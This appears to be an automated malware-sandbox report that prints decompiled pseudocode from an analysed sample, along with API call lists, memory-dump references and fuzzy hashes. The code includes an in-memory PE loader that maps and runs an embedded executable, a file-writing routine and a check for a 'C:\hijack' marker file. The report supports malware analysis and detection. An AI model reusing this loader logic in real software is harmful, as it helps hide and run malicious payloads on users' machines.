				_v8 = 0xffffffff;
				E100011A0( &_v312);
				 *[fs:0x0] = _v16;
				return _a4;
			}














                                                                                                                                                      0x1001a740
                                                                                                                                                      0x1001a740
                                                                                                                                                      0x1001a740
                                                                                                                                                      0x1001a743
                                                                                                                                                      0x1001a745
                                                                                                                                                      0x1001a750
                                                                                                                                                      0x1001a751
                                                                                                                                                      0x1001a75e
                                                                                                                                                      0x1001a773
                                                                                                                                                      0x1001a778
                                                                                                                                                      0x1001a77f
                                                                                                                                                      0x1001a794
                                                                                                                                                      0x1001a7a3
                                                                                                                                                      0x1001a7a8
                                                                                                                                                      0x1001a7af
                                                                                                                                                      0x1001a7b4
                                                                                                                                                      0x1001a7b7
                                                                                                                                                      0x1001a7b9
                                                                                                                                                      0x1001a7cc
                                                                                                                                                      0x1001a7d1
                                                                                                                                                      0x1001a7d1
                                                                                                                                                      0x1001a7e3
                                                                                                                                                      0x1001a7f6
                                                                                                                                                      0x1001a801
                                                                                                                                                      0x1001a802
                                                                                                                                                      0x1001a814
                                                                                                                                                      0x1001a822
                                                                                                                                                      0x1001a828
                                                                                                                                                      0x1001a835
                                                                                                                                                      0x1001a840
                                                                                                                                                      0x1001a84a

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A794
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC28
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC45
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                        • Part of subcall function 1001DC00: GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                        • Part of subcall function 1001DC00: _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                      • _strlen.LIBCMT ref: 1001A7AF
                                                                                                                                                      • _strcpy_s.LIBCMT ref: 1001A7CC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strcpy_s$Version_strlen
                                                                                                                                                      • String ID: unknown err
                                                                                                                                                      • API String ID: 3541540748-813478822
                                                                                                                                                      • Opcode ID: 1afc326e267b248bed630016db321b3469e2e1c022afc86cb818c24d622b85b2
                                                                                                                                                      • Instruction ID: 908e89cf5b9352ff889f1a9c3fa8eeef98413c65ec874cc1b061f0950b8e6722
                                                                                                                                                      • Opcode Fuzzy Hash: 1afc326e267b248bed630016db321b3469e2e1c022afc86cb818c24d622b85b2
                                                                                                                                                      • Instruction Fuzzy Hash: 6F214FB5C0021CABDB28DB54DD82BD9B774EB04754F4041D4B609A7285EB74BB84CFD2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004051A9, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 156COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                      			E004051A9(signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v3;
				void* _v8;
				signed short* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				void* _t102;
				intOrPtr _t149;
				void* _t156;
				void* _t158;

				_v12 = _a4;
				if(( *_v12 & 0x0000ffff) == 0x5a4d) {
					_v36 = _a4 + _v12[0x1e];
					if( *_v36 == 0x4550) {
						_v16 = VirtualAlloc( *(_v36 + 0x34),  *(_v36 + 0x50), 0x3000, 4);
						if(_v16 != 0) {
							L7:
							_v28 = VirtualAlloc(0, 0x1c, 0x3000, 4);
							if(_v28 != 0) {
								 *((intOrPtr*)(_v28 + 4)) = _v16;
								 *(_v28 + 8) = 0;
								 *((intOrPtr*)(_v28 + 0xc)) = _a8;
								 *((intOrPtr*)(_v28 + 0x10)) = _a12;
								 *((intOrPtr*)(_v28 + 0x14)) = _a16;
								0x8958a00a();
								asm("sbb [edx+0x4], ch");
								_v8 = VirtualAlloc(_v16,  *(_v36 + 0x54), 0x1000, ??);
								E004053A9(_v8, _v12, _v12[0x1e] +  *(_v36 + 0x54));
								 *_v28 = _v8 + _v12[0x1e];
								 *((intOrPtr*)( *_v28 + 0x34)) = _v16;
								E00405599(_a4, _v36, _v28); // executed
								_t158 = _t156 + 0x18;
								_t149 = _v16 -  *(_v36 + 0x34);
								_v32 = _t149;
								if(_t149 != 0) {
									E00405809(_v28, _v32);
									_t158 = _t158 + 8;
								}
								_t102 = E004058E9(_v28); // executed
								if(_t102 != 0) {
									E00405699(_v28); // executed
									if( *((intOrPtr*)( *_v28 + 0x28)) == 0) {
										L18:
										return _v28;
									}
									_v24 = _v16 +  *((intOrPtr*)( *_v28 + 0x28));
									_v20 = _v24(_v16, 1, 0);
									if(_v20 != 0) {
										 *(_v28 + 8) = 1;
										goto L18;
									}
									L19:
									return 0;
								}
								goto L19;
							}
							return 0;
						}
						_v16 = _a16(0,  *(_v36 + 0x50), 0x3000, 4);
						if(_v16 != 0) {
							goto L7;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}
















                                                                                                                                                      0x004051b2
                                                                                                                                                      0x004051c1
                                                                                                                                                      0x004051d3
                                                                                                                                                      0x004051df
                                                                                                                                                      0x00405200
                                                                                                                                                      0x00405207
                                                                                                                                                      0x0040522c
                                                                                                                                                      0x0040523a
                                                                                                                                                      0x00405241
                                                                                                                                                      0x00405250
                                                                                                                                                      0x00405256
                                                                                                                                                      0x00405263
                                                                                                                                                      0x0040526c
                                                                                                                                                      0x00405275
                                                                                                                                                      0x0040527a
                                                                                                                                                      0x00405280
                                                                                                                                                      0x00405296
                                                                                                                                                      0x004052ae
                                                                                                                                                      0x004052c2
                                                                                                                                                      0x004052cc
                                                                                                                                                      0x004052db
                                                                                                                                                      0x004052e0
                                                                                                                                                      0x004052e9
                                                                                                                                                      0x004052ec
                                                                                                                                                      0x004052ef
                                                                                                                                                      0x004052f9
                                                                                                                                                      0x004052fe
                                                                                                                                                      0x004052fe
                                                                                                                                                      0x00405305
                                                                                                                                                      0x0040530f
                                                                                                                                                      0x00405319
                                                                                                                                                      0x0040532a
                                                                                                                                                      0x0040535c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040535c
                                                                                                                                                      0x00405337
                                                                                                                                                      0x00405345
                                                                                                                                                      0x0040534c
                                                                                                                                                      0x00405355
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405355
                                                                                                                                                      0x00405361
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405361
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405311
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405243
                                                                                                                                                      0x0040521c
                                                                                                                                                      0x00405223
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405225
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004051e1
                                                                                                                                                      0x00000000

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: mQ@
                                                                                                                                                      • API String ID: 0-1781705956
                                                                                                                                                      • Opcode ID: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                      • Instruction ID: 541d6754dc273e5e7774517d21eb6bbd513450c5919ac0484350b505b9df1b02
                                                                                                                                                      • Opcode Fuzzy Hash: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                      • Instruction Fuzzy Hash: 3F61EBB4E00609EFDB04CF94C885AAFBBB5FF48314F108559E905AB381D775A941CFA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405599, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 88memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405599(intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _t55;
				void* _t58;
				void* _t100;

				_t1 =  &_a12; // 0x4052e0
				_v20 =  *((intOrPtr*)( *_t1 + 4));
				_t4 =  &_a12; // 0x4052e0
				_t5 =  &_a12; // 0x4052e0
				_v24 =  *((intOrPtr*)( *_t4)) + ( *( *((intOrPtr*)( *_t5)) + 0x14) & 0x0000ffff) + 0x18;
				_v8 = 0;
				while(1) {
					_t15 =  &_a12; // 0x4052e0
					_t55 =  *((intOrPtr*)( *_t15));
					if(_v8 >= ( *(_t55 + 6) & 0x0000ffff)) {
						break;
					}
					if( *(_v24 + 0x10) != 0) {
						_t39 =  &_v20; // 0x4052e0
						_t58 = VirtualAlloc( *_t39 +  *((intOrPtr*)(_v24 + 0xc)),  *(_v24 + 0x10), 0x1000, 4); // executed
						_v12 = _t58;
						E004053A9(_v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *(_v24 + 0x10));
						_t100 = _t100 + 0xc;
						 *((intOrPtr*)(_v24 + 8)) = _v12;
					} else {
						_v16 =  *((intOrPtr*)(_a8 + 0x38));
						if(_v16 > 0) {
							_t26 =  &_v20; // 0x4052e0
							_t28 =  &_a12; // 0x4052e0
							_v12 =  *((intOrPtr*)( *((intOrPtr*)( *_t28 + 0x14))))( *_t26 +  *((intOrPtr*)(_v24 + 0xc)), _v16, 0x1000, 4);
							 *((intOrPtr*)(_v24 + 8)) = _v12;
							E00405369(_v12, _v12, 0, _v16);
							_t100 = _t100 + 0xc;
						}
					}
					_v8 = _v8 + 1;
					_v24 = _v24 + 0x28;
				}
				return _t55;
			}











                                                                                                                                                      0x0040559f
                                                                                                                                                      0x004055a5
                                                                                                                                                      0x004055a8
                                                                                                                                                      0x004055ad
                                                                                                                                                      0x004055ba
                                                                                                                                                      0x004055bd
                                                                                                                                                      0x004055d8
                                                                                                                                                      0x004055d8
                                                                                                                                                      0x004055db
                                                                                                                                                      0x004055e4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055f1
                                                                                                                                                      0x00405650
                                                                                                                                                      0x0040565d
                                                                                                                                                      0x0040565f
                                                                                                                                                      0x00405677
                                                                                                                                                      0x0040567c
                                                                                                                                                      0x00405685
                                                                                                                                                      0x004055f3
                                                                                                                                                      0x004055f9
                                                                                                                                                      0x00405600
                                                                                                                                                      0x00405610
                                                                                                                                                      0x00405617
                                                                                                                                                      0x0040561f
                                                                                                                                                      0x00405628
                                                                                                                                                      0x00405635
                                                                                                                                                      0x0040563a
                                                                                                                                                      0x0040563a
                                                                                                                                                      0x0040563d
                                                                                                                                                      0x004055cc
                                                                                                                                                      0x004055d5
                                                                                                                                                      0x004055d5
                                                                                                                                                      0x00405690

                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000065,00000000,00001000,00000004,?,004052E0,?,?), ref: 0040565D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID: R@$R@
                                                                                                                                                      • API String ID: 4275171209-183225046
                                                                                                                                                      • Opcode ID: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                      • Instruction ID: 8040a1e4124e533603aae13ccacedffe6b0048f7b84320d0b4bad592607f7773
                                                                                                                                                      • Opcode Fuzzy Hash: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                      • Instruction Fuzzy Hash: 0F41BAB4A00209DFCB08CF88C990AAEB7B1FF48304F208559E915AB395D775EE51CFA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000CE64, Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                                      			E1000CE64(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				void* _t2;
				void* _t6;
				void* _t10;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t22;
				intOrPtr _t24;
				void* _t28;
				void* _t30;
				void* _t32;

				_t18 = __edx;
				_t12 = HeapAlloc;
				do {
					_t32 =  *0x10333310; // 0x800000
					_t20 = _t30;
					if(_t32 == 0) {
						E100119E6(_t12, _t18, _t20, _t32);
						E10011846(0x1e);
						E100115A8(0xff);
					}
					_t1 =  *0x10335f3c;
					if(_t1 != 1) {
						__eflags = _t1 - 3;
						if(__eflags != 0) {
							L10:
							__eflags = _t30;
							if(_t30 == 0) {
								_t20 = 1;
								__eflags = 1;
							}
							_t22 = _t20 + 0x0000000f & 0xfffffff0;
							__eflags = _t22;
							_push(_t22);
							goto L13;
						} else {
							_push(_t30);
							_t2 = E1000CE07(_t12, _t20, 0, __eflags);
							__eflags = _t2;
							if(__eflags == 0) {
								goto L10;
							}
						}
					} else {
						if(_t30 == 0) {
							_t10 = 1;
							__eflags = 1;
						} else {
							_t10 = _t30;
						}
						_push(_t10);
						L13:
						_push(0);
						_t2 = RtlAllocateHeap( *0x10333310); // executed
					}
					_t28 = _t2;
					if(_t28 == 0) {
						_t24 = 0xc;
						if( *0x103337d4 == _t2) {
							 *((intOrPtr*)(E1000F720(__eflags))) = _t24;
							L19:
							 *((intOrPtr*)(E1000F720(_t37))) = _t24;
						} else {
							goto L16;
						}
					}
					return _t28;
					L16:
					_t6 = E100108CA(_t30);
					_t37 = _t6;
				} while (_t6 != 0);
				goto L19;
			}


















                                                                                                                                                      0x1000ce64
                                                                                                                                                      0x1000ce65
                                                                                                                                                      0x1000ce6d
                                                                                                                                                      0x1000ce6f
                                                                                                                                                      0x1000ce75
                                                                                                                                                      0x1000ce77
                                                                                                                                                      0x1000ce79
                                                                                                                                                      0x1000ce80
                                                                                                                                                      0x1000ce8a
                                                                                                                                                      0x1000ce90
                                                                                                                                                      0x1000ce91
                                                                                                                                                      0x1000ce99
                                                                                                                                                      0x1000cea9
                                                                                                                                                      0x1000ceac
                                                                                                                                                      0x1000ceb9
                                                                                                                                                      0x1000ceb9
                                                                                                                                                      0x1000cebb
                                                                                                                                                      0x1000cebf
                                                                                                                                                      0x1000cebf
                                                                                                                                                      0x1000cebf
                                                                                                                                                      0x1000cec3
                                                                                                                                                      0x1000cec3
                                                                                                                                                      0x1000cec6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ceae
                                                                                                                                                      0x1000ceae
                                                                                                                                                      0x1000ceaf
                                                                                                                                                      0x1000ceb4
                                                                                                                                                      0x1000ceb7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ceb7
                                                                                                                                                      0x1000ce9b
                                                                                                                                                      0x1000ce9d
                                                                                                                                                      0x1000cea5
                                                                                                                                                      0x1000cea5
                                                                                                                                                      0x1000ce9f
                                                                                                                                                      0x1000ce9f
                                                                                                                                                      0x1000ce9f
                                                                                                                                                      0x1000cea6
                                                                                                                                                      0x1000cec7
                                                                                                                                                      0x1000cec7
                                                                                                                                                      0x1000cece
                                                                                                                                                      0x1000cece
                                                                                                                                                      0x1000ced0
                                                                                                                                                      0x1000ced4
                                                                                                                                                      0x1000cede
                                                                                                                                                      0x1000cedf
                                                                                                                                                      0x1000cef3
                                                                                                                                                      0x1000cef5
                                                                                                                                                      0x1000cefa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000cedf
                                                                                                                                                      0x1000cf02
                                                                                                                                                      0x1000cee1
                                                                                                                                                      0x1000cee2
                                                                                                                                                      0x1000cee7
                                                                                                                                                      0x1000cee9
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 1000CE79
                                                                                                                                                        • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A0D
                                                                                                                                                        • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A17
                                                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 1000CE80
                                                                                                                                                        • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118B2
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 100118C3
                                                                                                                                                        • Part of subcall function 10011846: GetModuleFileNameA.KERNEL32(00000000,103334D9,00000104,?,103332E0,00000000), ref: 100118DF
                                                                                                                                                        • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118F4
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 10011907
                                                                                                                                                        • Part of subcall function 10011846: _strlen.LIBCMT ref: 10011910
                                                                                                                                                        • Part of subcall function 10011846: _strlen.LIBCMT ref: 1001191D
                                                                                                                                                        • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 1001194A
                                                                                                                                                        • Part of subcall function 100115A8: ___crtCorExitProcess.LIBCMT ref: 100115AC
                                                                                                                                                        • Part of subcall function 100115A8: ExitProcess.KERNEL32 ref: 100115B6
                                                                                                                                                        • Part of subcall function 1000CE07: ___sbh_alloc_block.LIBCMT ref: 1000CE2F
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 1000CECE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3791426274-0
                                                                                                                                                      • Opcode ID: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                      • Instruction ID: 6f1a83c6d6f502121b77b2a43b6d62c081e19aaa5c93b61cf19e771af3aa1e29
                                                                                                                                                      • Opcode Fuzzy Hash: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                      • Instruction Fuzzy Hash: 5401F936B493EE9AF221D765DCC1D6E72CDDBC16F0F220126F948CA59ACB60DC8142E1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001FC10, Relevance: 4.5, APIs: 3, Instructions: 34fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001FC10(CHAR* _a4, void* _a8, long _a12) {
				void* _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _t12;
				int _t14;

				_v16 = 0;
				_t12 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v8 = _t12;
				_t14 = WriteFile(_v8, _a8, _a12,  &_v12, 0); // executed
				if(_t14 != 0) {
					_v16 = 1;
				}
				CloseHandle(_v8);
				return _v16;
			}








                                                                                                                                                      0x1001fc16
                                                                                                                                                      0x1001fc33
                                                                                                                                                      0x1001fc39
                                                                                                                                                      0x1001fc4e
                                                                                                                                                      0x1001fc56
                                                                                                                                                      0x1001fc58
                                                                                                                                                      0x1001fc58
                                                                                                                                                      0x1001fc63
                                                                                                                                                      0x1001fc6f

                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileA.KERNELBASE(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                      • WriteFile.KERNELBASE(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
                                                                                                                                                      • CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1065093856-0
                                                                                                                                                      • Opcode ID: 58dcd373d95f935da9dab33e0afd965a40fce0c80e25616e4d47ed3d20d7db64
                                                                                                                                                      • Instruction ID: 8035e793fd9196c22525ec6c46e761f67ba1426afb40fad35566dc0bfd35744e
                                                                                                                                                      • Opcode Fuzzy Hash: 58dcd373d95f935da9dab33e0afd965a40fce0c80e25616e4d47ed3d20d7db64
                                                                                                                                                      • Instruction Fuzzy Hash: A3F0BD75B40208BBEB14DFD4DD95F9EB7B8EB48700F20C148FA18AB280D675AA059B64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001F1C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001F1C0() {
				int _t1;

				_t1 = PathFileExistsA("C:\\hijack"); // executed
				return _t1;
			}




                                                                                                                                                      0x1001f1c8
                                                                                                                                                      0x1001f1cf

                                                                                                                                                      APIs
                                                                                                                                                      • PathFileExistsA.KERNELBASE(C:\hijack,?,1001F1E2,?,100227A9,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F1C8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                      • String ID: C:\hijack
                                                                                                                                                      • API String ID: 1174141254-148195797
                                                                                                                                                      • Opcode ID: 14122fe3a97c240cae0ebc801744e2228d29e9584bc9b60296d3da73ca953798
                                                                                                                                                      • Instruction ID: cbcd4ec5042ff81f7f552497cc273b56006d66024910556231888f1c34088e01
                                                                                                                                                      • Opcode Fuzzy Hash: 14122fe3a97c240cae0ebc801744e2228d29e9584bc9b60296d3da73ca953798
                                                                                                                                                      • Instruction Fuzzy Hash: 71A022300C020CB3800023CABC0C8E0BB0CC8888333800000FA0E000008B23202000AA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405279, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 62memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                      			E00405279(void* __eax) {
				void* _t55;
				intOrPtr _t58;
				intOrPtr _t82;
				void* _t87;
				void* _t88;
				void* _t90;
				void* _t92;

				_t88 = _t87 + 1;
				0x8958a00a();
				asm("sbb [edx+0x4], ch");
				 *((intOrPtr*)(_t88 - 4)) = VirtualAlloc( *(_t88 - 0xc),  *( *((intOrPtr*)(_t88 - 0x20)) + 0x54), 0x1000, ??);
				E004053A9( *((intOrPtr*)(_t88 - 4)),  *((intOrPtr*)(_t88 - 8)),  *((intOrPtr*)( *((intOrPtr*)(_t88 - 8)) + 0x3c)) +  *( *((intOrPtr*)(_t88 - 0x20)) + 0x54));
				 *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) =  *((intOrPtr*)(_t88 - 4)) +  *((intOrPtr*)( *((intOrPtr*)(_t88 - 8)) + 0x3c));
				 *( *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) + 0x34) =  *(_t88 - 0xc);
				E00405599( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 - 0x20)),  *((intOrPtr*)(_t88 - 0x18))); // executed
				_t92 = _t90 + 0x18;
				_t82 =  *(_t88 - 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x20)) + 0x34));
				 *((intOrPtr*)(_t88 - 0x1c)) = _t82;
				if(_t82 != 0) {
					E00405809( *((intOrPtr*)(_t88 - 0x18)),  *((intOrPtr*)(_t88 - 0x1c)));
					_t92 = _t92 + 8;
				}
				_t55 = E004058E9( *((intOrPtr*)(_t88 - 0x18))); // executed
				if(_t55 != 0) {
					E00405699( *((intOrPtr*)(_t88 - 0x18))); // executed
					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) + 0x28)) == 0) {
						L8:
						_t58 =  *((intOrPtr*)(_t88 - 0x18));
					} else {
						 *((intOrPtr*)(_t88 - 0x14)) =  *(_t88 - 0xc) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) + 0x28));
						 *((intOrPtr*)(_t88 - 0x10)) =  *((intOrPtr*)(_t88 - 0x14))( *(_t88 - 0xc), 1, 0);
						if( *((intOrPtr*)(_t88 - 0x10)) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)) + 8)) = 1;
							goto L8;
						} else {
							goto L9;
						}
					}
				} else {
					L9:
					_t58 = 0;
				}
				return _t58;
			}










                                                                                                                                                      0x00405279
                                                                                                                                                      0x0040527a
                                                                                                                                                      0x00405280
                                                                                                                                                      0x00405296
                                                                                                                                                      0x004052ae
                                                                                                                                                      0x004052c2
                                                                                                                                                      0x004052cc
                                                                                                                                                      0x004052db
                                                                                                                                                      0x004052e0
                                                                                                                                                      0x004052e9
                                                                                                                                                      0x004052ec
                                                                                                                                                      0x004052ef
                                                                                                                                                      0x004052f9
                                                                                                                                                      0x004052fe
                                                                                                                                                      0x004052fe
                                                                                                                                                      0x00405305
                                                                                                                                                      0x0040530f
                                                                                                                                                      0x00405319
                                                                                                                                                      0x0040532a
                                                                                                                                                      0x0040535c
                                                                                                                                                      0x0040535c
                                                                                                                                                      0x0040532c
                                                                                                                                                      0x00405337
                                                                                                                                                      0x00405345
                                                                                                                                                      0x0040534c
                                                                                                                                                      0x00405355
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040534e
